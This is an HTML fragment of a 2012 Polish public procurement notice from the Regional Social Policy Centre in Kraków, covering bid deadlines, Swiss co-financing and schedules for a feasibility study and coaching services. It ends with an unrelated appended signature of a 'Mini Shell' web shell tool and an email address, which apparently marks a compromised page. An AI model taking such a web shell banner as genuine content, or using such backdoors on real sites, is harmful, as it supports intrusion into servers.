<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2012 godzina 12:00, miejsce: REGIONALNY OŚRODEK POLITYKI SPOŁECZNEJ W KRAKOWIE, ul. Piastowska 32, 30-070 Kraków, w sekretariacie (pok. nr 7, I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane przez Szwajcarię w ramach szwajcarskiego programu współpracy z nowymi krajami członkowskimi Unii Europejskiej. W pkt.II.2) ogłoszenia powinno być: 1) Realizacja całości zamówienia odbywać się będzie w okresie od dnia zawarcia umowy w sprawie niniejszego zamówienia najpóźniej do 31 lipca 2012 roku.
2) Termin zakończenia realizacji zamówienia może ulec zmianie.
3) Studium wykonalności wraz z instrukcją należy opracować w terminie 2 tygodni od dnia podpisania umowy, lecz nie później niż do dnia 19 marca 2012 r. Termin opracowania studium wykonalności wraz z instrukcją za zgodą Zamawiającego może ulec przedłużeniu.
4) Świadczenie usług coachingowych odbywać się będzie w okresie naboru wniosków o dofinansowanie trwającego 3 miesiące. Zamawiający przewiduje, iż nabór wniosków odbędzie się w drugim kwartale 2012 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com